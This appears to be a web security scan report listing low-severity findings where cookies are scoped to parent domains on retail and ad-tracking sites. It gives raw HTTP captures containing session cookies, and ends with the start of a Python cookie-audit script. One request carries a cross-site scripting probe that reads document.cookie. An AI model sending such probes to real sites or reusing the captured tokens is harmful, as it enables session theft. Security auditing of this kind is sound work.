X-Varnish: 887041366
Age: 0
Via: 1.1 varnish
Connection: keep-alive
Content-Length: 198838


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div id="toolbar_signin_form" width="240" style="z-index:1001">
<form style="margin:0px;" action="https://ordering.ftd.com/528/signin/">
<table width="240" border="0" cellpadding="1">
...[SNIP]...
</label>
<input class="password" type="password" name="password" value="" maxlength="18" style="width:125px;" /></div>
...[SNIP]...

12. Cookie scoped to parent domain
There are 91 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


12.1. http://eval.bizrate.com/js/survey_126457_1.js

Summary

Severity:   Low
Confidence:   Firm
Host:   http://eval.bizrate.com
Path:   /js/survey_126457_1.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: sessionid, br, _data

One of these cookies appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /js/survey_126457_1.js HTTP/1.1
Host: eval.bizrate.com
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sessionid=720232510841276994; br=13055101949906417201602020302001211; _data=_time%3A%3Astart_time%3D1305510194%3Btimestamp%3D1305510194%7Ctracker%3A%3Ahtcnt%3D1%3Brf%3Dsur

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="NON DSP ADM DEV PSD CUSo OUR IND STP PRE NAV UNI"
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: sessionid=720232510841276994; Domain=.bizrate.com; Expires=Tue, 17-May-2011 01:54:05 GMT; Path=/
Set-Cookie: br=13055101949906417201602020302001211; Domain=.bizrate.com; Expires=Thu, 13-May-2021 01:54:05 GMT; Path=/
Set-Cookie: _data=_time%3A%3Astart_time%3D1305510194%3Btimestamp%3D1305510845%7Ctracker%3A%3Ahtcnt%3D2%3Brf%3Dsur; Domain=.bizrate.com; Expires=Tue, 17-May-2011 01:54:05 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Mon, 16 May 2011 01:54:04 GMT
Content-Length: 16130

<!-- // hide script
var BIZRATE = {
init:function() {
this.mid = '126457';
this.type = 1;
if (typeof(this.type) != 'undefined' && this.type > 0 && this.type <= 3) {

...[SNIP]...

12.2. http://login.dotomi.com/ucm/UCMController

Summary

Severity:   Low
Confidence:   Firm
Host:   http://login.dotomi.com
Path:   /ucm/UCMController

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: DotomiUser, DotomiSession_2223, DotomiNet

One of these cookies appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ucm/UCMController?dtm_com=28&dtm_fid=101&dtm_cid=2223&dtm_cmagic=04048a&dtm_format=5&cli_promo_id=1&dtm_user_id=&dtmc_department=&dtmc_category=Home&dtmc_sub_category=&dtmc_brand=&dtmc_gender=&dtmc_team=&dtmc_product_id=&dtmc_prod_img=&dtmc_loc=http%3A//www.footlocker.com/&dtmc_cg=HOME%3AHome%3ATechnicalProperties&dtmc_source=&dtmc_matchback_id=31176371511204337200580613&dtmc_ref= HTTP/1.1
Host: login.dotomi.com
Proxy-Connection: keep-alive
Referer: http://www.footlocker.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=173.193.214.243.1305509455494172; DotomiUser=330100732990473967$0$335422886; DotomiSession_2223=2_371600731220825851$330100732990473967$335422886$1305510236018; DotomiNet=2$DjQqblZ1RXdFAmddAAR7XAZHKSpAJ24SQR0PVVBLY3Jma1xARWZBXQAFW0dLSkdZYmFbf2xjVnBRIgFAaV0%3D

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:00:18 GMT
X-Name: dmc-o01
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, private
P3P: "policyref="/w3c/p3p.xml", CP="NOI DSP NID OUR STP""
Set-Cookie: DotomiUser=330100732990473967$0$335422886; Domain=.dotomi.com; Expires=Wed, 15-May-2013 02:00:19 GMT; Path=/
Set-Cookie: DotomiSession_2223=2_371600731220825851$330100732990473967$335422886$1305511219021; Domain=.dotomi.com; Path=/
Set-Cookie: DotomiNet=2$DjQqblZ1RXdFAmBdAgpyVAJHKDNEGQNFC15tVlFJZnhgewkJDQBKXRZSBwIZJRQWJA1ZfmhgWnZRIgFAaV0%3D; Domain=.dotomi.com; Expires=Wed, 15-May-2013 02:00:19 GMT; Path=/
Content-Type: text/html
Content-Length: 1523

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
</head>

<body>
<script language="JavaScript" typ
...[SNIP]...

12.3. https://secure.bhphotovideo.com/bnh/controller/home

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.bhphotovideo.com
Path:   /bnh/controller/home

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: JSESSIONID, cookieID

One of these cookies appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bnh/controller/home?O=cart.jsp&A=getpage&Q=Login.jsp&f6d64%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb73022ddbd=1 HTTP/1.1
Host: secure.bhphotovideo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://secure.bhphotovideo.com/bnh/controller/home?O=cart.jsp&A=getpage&Q=Login.jsp&f6d64%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb73022ddbd=1
Cookie: TS20403f=b545291670a393ddc6eb9163287e33afe2a7ac07bec18dbf4dd10530

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Expires: Mon, 16 May 2011 11:06:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 11:06:56 GMT
Connection: keep-alive
Set-Cookie: JSESSIONID=nr1QNRFMzp!1551726241; domain=bhphotovideo.com; path=/
Set-Cookie: cookieID=18171364821305544044440; domain=bhphotovideo.com; expires=Saturday, 03-Jun-2079 14:21:31 GMT; path=/
Set-Cookie: TS20403f=b545291670a393ddc6eb9163287e33afe2a7ac07bec18dbf4dd10530; Path=/
Content-Length: 30873

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="/FrameWork/js/t
...[SNIP]...

12.4. https://secure.homedepot.ca/webapp/wcs/stores/servlet/UserRegistrationForm

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.homedepot.ca
Path:   /webapp/wcs/stores/servlet/UserRegistrationForm

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: WC_SESSION_ESTABLISHED, WC_ACTIVESTOREDATA, WC_AUTHENTICATION_-1002, WC_USERSESSION_-1002

One of these cookies appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/UserRegistrationForm?langId=-15&storeId=10051&catalogId=10051&new=Y HTTP/1.1
Host: secure.homedepot.ca
Connection: keep-alive
Referer: http://www.homedepot.ca/webapp/wcs/stores/servlet/Home?storeId=10051&catalogId=10051&langId=-15
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=135472616.1305510002.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=989860238041728; hd_search_cookie=1; localRegion=446%2C7080%2CToronto%2C43.6687%2C-79.3382; s_vi=[CS]v1|26E840400507A189-40000102A0090C5F[CE]; __utma=135472616.1475317367.1305510002.1305510002.1305510002.1; __utmc=135472616; __utmb=135472616.2.10.1305510002; RES_SESSIONID=223896591225639; ResonanceSegment=1; s_cc=true; fsr.s={"v":1,"rid":"1305510029454_909320","to":5,"c":"http://www.homedepot.ca/webapp/wcs/stores/servlet/Home","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305510812715}; s_v14=English; s_sq=homedepotca%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttps%25253A%25252F%25252Fsecure.homedepot.ca%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FUserRegistrationForm%25253FlangId%25253D-15%252526storeId%25253D10051%252526%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Date: Mon, 16 May 2011 02:10:38 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: WCS_UNIQUE_ID=HCa6Eud8L9hN21YyVUS%2bHaSDQgY%3d%0a; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/; Domain=.homedepot.ca
Set-Cookie: WC_ACTIVESTOREDATA=%2d15%2c10051; Path=/; Domain=.homedepot.ca
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2crW6rzz%2fYGsIblj6FaaWMw7l8O7Y%3d; Path=/; Domain=.homedepot.ca; Secure
Set-Cookie: WC_USERSESSION_-1002=%2d1002%2c%2d15%2cCAD%2c%2d2000%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c10501%7c10501%7cnull%7c%2d2000%5d%2cSPiv6UKbre34gGrW2piYfWv44EQ%3d; Path=/; Domain=.homedepot.ca
Set-Cookie: JSESSIONID=0001VzTy5fzfDUHAYcFBVD3sOyb:-4C1Q63; Path=/
Cache-Control: no-store, no-cache
Expires: 0
Pragma: no-cache
Content-Length: 75346


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
...[SNIP]...

12.5. https://secure.orientaltrading.com/ui/userProfile/processRequest.do

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.orientaltrading.com
Path:   /ui/userProfile/processRequest.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: JSESSIONID

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ui/userProfile/processRequest.do?requestURI=displayLogin HTTP/1.1
Host: secure.orientaltrading.com
Connection: keep-alive
Referer: http://www.orientaltrading.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=17jLNQBXSqTLZLn22gSGhQZ1qn1JzhCKMpsNG12T0S6Y29Lzpcvx!-2120161015; otc_visitor_id=U6c411c8e35469d5c3d093388c1dc89a2; otc_new_mktg_visitor=21758503; CoreM_State=61~1.0~-1~-1~E~3~3~5~3~3~7~7~|~~|~~|~~|~||||||; mt.v=1.322159034.1305510206640; fsr.s={"v":1,"rid":"1305510222528_763877","pv":2,"to":5,"c":"http://www.orientaltrading.com/","lc":{"d0":{"v":2,"s":true}},"cd":0,"sd":0,"f":1305510848788}

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:16:41 GMT
Server: Apache
Set-Cookie: JSESSIONID=LSR0NQ5JncTchv2GrGWHyGDfvFpDKhs5c5ThHL92VQvcmKBTQLms!-2120161015; domain=.orientaltrading.com; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 85683


                                       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


       
...[SNIP]...

12.6. http://www.bhphotovideo.com/c/browse/Underwater-Equipment/ci/11585/N/4294551294

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bhphotovideo.com
Path:   /c/browse/Underwater-Equipment/ci/11585/N/4294551294

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: JSESSIONID

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c/browse/Underwater-Equipment/ci/11585/N/4294551294 HTTP/1.1
Host: www.bhphotovideo.com
Proxy-Connection: keep-alive
Referer: http://www.bhphotovideo.com/bnh/controller/home?KW=BANNER2&img=bh_wl.gif
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0pnRNQQMwR!-112699937; cookieID=18154535221305509932941; cmTPSet=Y; TS29f0cc=7f329831c9f74bab89d73187e3b1cfd8871d7ea6dc67d58e4dd0837960ac0ec5a2f86729b092ce85bc587bdd; cmRS=&t1=1305510783215&t2=1305510792033&t3=1305541011993&t4=1305510778300&lti=1305541011993&ln=Underwater&hr=/c/browse/Underwater-Equipment/ci/11585/N/4294551294&fti=&fn=searchForm%3A0%3BNwsLtrSgnUp_Subscribe%3A1%3B&ac=&fd=&uer=&fu=&pi=RootPage.jsp&ho=server.bhphotovideo.com/cm%3F&ci=90132819

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Cache-Control: no-cache="set-cookie"
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
X-UA-Compatible: IE=EmulateIE7
Date: Mon, 16 May 2011 10:16:53 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=2STpNQ5TWC!-112699937; domain=bhphotovideo.com; path=/
Set-Cookie: TS29f0cc=c688b8f92f50d9b7e80f755703dbb3d6871d7ea6dc67d58e4dd0f99460ac0ec5f5b84ed0b092ce85bc587bdd; Path=/
Content-Length: 37549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<!--<meta http-equiv
...[SNIP]...

12.7. http://a.netmng.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.netmng.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: evo5

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?aid=088 HTTP/1.1
Host: a.netmng.com
Proxy-Connection: keep-alive
Referer: http://www.travelguard.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=488b3b2b-2198-4f8a-bafb-65af73521f16; evo5=csmq4atf04cxa%7CJeuRJCb45V6uwY1xci0duejpNnUE%2BOmzqGMogMAW%2FNCOqkjFJeQTtSSwFM8SExogUBVq3aRXr6rOPcqNTmIC7EZV1nRS%2FfrPyazw99gyUAJXaI4v2Tf%2FYK%2FYCGNRiTDa8FIC%2F1rDdFnvxSKmwnP9%2FzSswr%2BFnZEedqWLNPmJOGiD%2BKTS14anDruAemPci57rfbGvxyPHPZwrhH9c2PC0R7Ymr8xiYKFUBnazCBzOBnL2qGd20SpExMUheTADl1d0TTjVbjvJQVia2%2BYow6VA05s7EZxex6vE%2BvmQgXxXWwR2mefK966%2FeFMgLbGnQsm5mGE5l%2BYsVCNKIKht%2BM7JXtn8nweceJeqZuNgJnNvN7mezkeiy1MIOhXMGKv%2BHUozybOtALE61aKDO%2BSoPj%2BhNGduTlw4jjewTANsUadm4eJQ75KAJA1KpHCSrfNDIRnHjMMAwYuzMxzJA7OiUPCwQbVx7hAHs0TdLiuv7ZzwK309%2BcMucPBVwOOwAyb9yajE

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:04 GMT
Server: Apache/2.2.9
P3P: policyref="http://a.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Sat, 14 May 2011 02:01:04 GMT
Last-Modified: Sat, 14 May 2011 02:01:04 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5=csmq4atf04cxa%7Co7sHAo0WiNAkV5aQXuATwLKnqcS7CiZMwsLzz4KjZ0u0qp3pkq8dEee9axkAPKMyKcjX7b%2Fj8u2pvMUKubOFmSXM7%2Bt0a6Ux23b%2BYSj08pAlornvRey34GAuBxIpydsc7XqPU6aRPmgH9%2FnsPER%2FdoRGgEVvdULoFhC9iH3sp31Vly6PXTxTMEfNAbPLdxsJgZThArgAu2FZdW2nOze9yxGDOI1muuzrVlGdOTN11V5CAWr3jbZbP%2FF39U8YDAxRZc6jF8SPBs2BGaJOfh52Yi4uav1ONnUmuw5m4GOxMErzgQqodDYqlk5V7GpMFF50jq1p9mFO%2BSMYIMzW0X2qY1bb0xTxY0WiV%2F05PStbeFKyfBPimlixNC1sOQBbQ3jEUFNFInZmY%2FCdeaP1REAfPTGTOBq3PsAoQ2Bd15zuYVt3hE%2BnRckFXgnwD2d8%2FOWdLYlMTkRkrg4XzCOJBw8F0TGKkTDwQxDH89mj%2FE24rfR9mqYMWMIDpv46H009GcZcooUqNc3iHid7BJ7%2BqsPj6hUcHS5wf1QjQ%2FsVI%2BkVsKU%3D; expires=Tue, 15-Nov-2011 02:01:04 GMT; path=/; domain=.netmng.com
Content-Length: 4
Connection: close
Content-Type: text/html; charset=UTF-8



12.8. http://a.rfihub.com/ca.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /ca.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: m, u, f, e

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ca.gif?rb=398&ca=20472990&ct=REPLACE_ME_WITH_YOUR_CACHE_BUSTING HTTP/1.1
Host: a.rfihub.com
Proxy-Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a=c615304299134845020; j=c615304299134845020; o=1-InfNhMB4STMs; p=1-InfNhMB4STMs; r=1305510033558; m="aAEeXBemQ==AI20473163AAABL_aCVOI=AI20472990AAABL_Z4vn0=AI20472990AAABL_Z4bls=AI20473163AAABL_Z2OJY="; u="aAB7h5nqw==AI89bBrQ==AAABL_aCVOI="; f="aABXkMDrQ==AK1305510033AB4AAABL_aCVOE="; e=co

Response

HTTP/1.1 302 Found
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: m="aAF25BkaA==AI20472990AAABL_aCnLI=AI20473163AAABL_aCVOI=AI20472990AAABL_Z4vn0=AI20472990AAABL_Z4bls=AI20473163AAABL_Z2OJY=";Path=/;Domain=.rfihub.com;Expires=Wed, 14-Nov-12 01:54:05 GMT
Set-Cookie: u="aAB7ilFUA==AI89bBrQ==AAABL_aCnLI=";Path=/;Domain=.rfihub.com;Expires=Wed, 14-Nov-12 01:54:05 GMT
Set-Cookie: f="aABTNDn0w==AK1305510033AB5AAABL_aCnLE=";Path=/;Domain=.rfihub.com;Expires=Wed, 14-Nov-12 01:54:05 GMT
Set-Cookie: e=co;Path=/;Domain=.rfihub.com;Expires=Wed, 14-Nov-12 01:54:05 GMT
Cache-Control: no-cache
Location: http://cm.g.doubleclick.net/pixel?nid=rfi&forward=http%3A%2F%2Fib.adnxs.com%2Fpxj%3Fbidder%3D18%26action%3Dsetuids%28%27615304299134845020%27%2C%27%27%29%3B%26redir%3Dhttp%253A%252F%252Fib.adnxs.com%252Fgetuidu%253Fhttp%253A%252F%252Fa.rfihub.com%252Fcm%253Fapxuid%253D%2524UID%2526forward%253Dhttp%25253A%25252F%25252Fib.adnxs.com%25252Fseg%25253Fadd%25253D79783%252526redir%25253Dhttp%2525253A%2525252F%2525252Fad.yieldmanager.com%2525252Fpixel%2525253Fid%2525253D1056936%25252526t%2525253D2%25252526piggyback%2525253Dhttp%252525253A%252525252F%252525252Fwww.googleadservices.com%252525252Fpagead%252525252Fconversion%252525252F1030878771%252525252F%252525253Flabel%252525253D8tkSCLfIiwIQs-zH6wM%2525252526amp%252525253Bguid%252525253DON%2525252526amp%252525253Bscript%252525253D0
Content-Length: 0


12.9. http://a.tribalfusion.com/i.cid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /i.cid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: ANON_ID

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i.cid?c=294813&d=30&page=landingPage HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=9342936133034.527?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=ainrPgt3erxPAxvPAB9VUZd5PbMJ94w4LX6qVV0Zcrx58XSW0MmLTRXaVdrFwaTw8GvrZb3

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 307
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=a9nrejs2aFvDAJsbYZd7FMh2nQCFRDH0fa1otdZaZbc1scXdKPKEpkJfRWcSiSsMhXqubGvEyor; path=/; domain=.tribalfusion.com; expires=Sun, 14-Aug-2011 01:55:18 GMT;
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,........@..D..;

12.10. http://action.media6degrees.com/orbserv/hbjs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://action.media6degrees.com
Path:   /orbserv/hbjs

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbjs?pixId=5204&pcv=30 HTTP/1.1
Host: action.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1564432;type=homep126;cat=homep272;ord=1;num=3148241261951.6255?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=BDC5BFE2B79833787C45D44D5E9395EC; ipinfo=2ll77mm0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; acs=014020a0g0h1ll77mmxzt12dfmxzt12dfmxzt10; clid=2ll77mm01171voofy6a0tk1w02ehk0093r080l08509; orblb=2ll8nk2031zw10u0100yjk2gu10u0100yg11y510u0100000; rdrlst=4090spbll9m03000000033r030d6hll8nk2000000083r0815ztll9l28000000043r040dlzll9l28000000043r0401hvll8nk2000000083r0816iell9m03000000033r030msvll9m03000000033r0301g3ll8nk2000000083r080e6mll9m03000000033r03; sglst=2050s90ill9m03000430033r030l03503dlell9l28000000043r040l045045msll9l28000000043r040l04504c24ll9l28000000043r040l045041jzll8nk200yk40083r080l08508; vstcnt=418b010r01496o0118e1002

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clid=2ll77mm01171voofy6a0tk1w02f1400a3r090l0950a; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
Set-Cookie: orblb=2ll8nk2032gu10u0200z3o00yg11zw10u0100yjk1y510u0100000; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
Set-Cookie: rdrlst=4090spbll9m03000000043r040d6hll8nk2000000093r090dlzll9l28000000053r0515ztll9l28000000053r0501hvll8nk2000000093r0916iell9m03000000043r0401g3ll8nk2000000093r090msvll9m03000000043r040e6mll9m03000000043r04; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
Set-Cookie: sglst=2050s90ill9m03000nn0043r040l04504dlell9l28000000053r050l055055msll9l28000000053r050l05505c24ll9l28000000053r050l055051jzll8nk200z3o0093r090l09509; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
Set-Cookie: vstcnt=418b010r01496o0118e1002; Domain=media6degrees.com; Expires=Sat, 12-Nov-2011 01:55:02 GMT; Path=/
Set-Cookie: JSESSIONID=E5833D4D3BA66471A3D9BEAA6132FFE0; Path=/orbserv
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 77
Date: Mon, 16 May 2011 01:55:01 GMT


(new Image(0,0)).src='http://ad.yieldmanager.com/pixel?t=2&id=1159169';
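The issue detail above is the same for every finding in this section, so one check serves all of them. The following Python script is an added example and is not part of the XSS.CX report or of any tool it used. It parses the Set-Cookie headers of a captured response, flags cookies whose Domain attribute is a proper parent of the issuing host, separates deletion headers (Expires in the past, such as the adh="" header above) from real assignments, and marks names that look like session tokens. The sample response is constructed from the action.media6degrees.com response above with the long cookie values shortened; the script uses the response's own Date header as the reference time, because evaluating 2011 expiry dates against today's clock would report every cookie as expired. SESSION_NAME_HINTS and the finding field names are this example's own choices.

```python
"""Audit Set-Cookie headers in a captured HTTP response for cookies scoped to a
parent of the issuing host. Added example; not part of the original report."""
import re
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime

# Constructed sample, trimmed from the action.media6degrees.com response above
# (cookie values shortened; Domain/Expires/Path attributes as captured).
SAMPLE_HOST = "action.media6degrees.com"
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache-Coyote/1.1\r\n"
    'Set-Cookie: adh=""; Domain=media6degrees.com; '
    "Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/\r\n"
    "Set-Cookie: clid=2ll77mm01171voofy6a0tk1w02f1400a3r090l0950a; "
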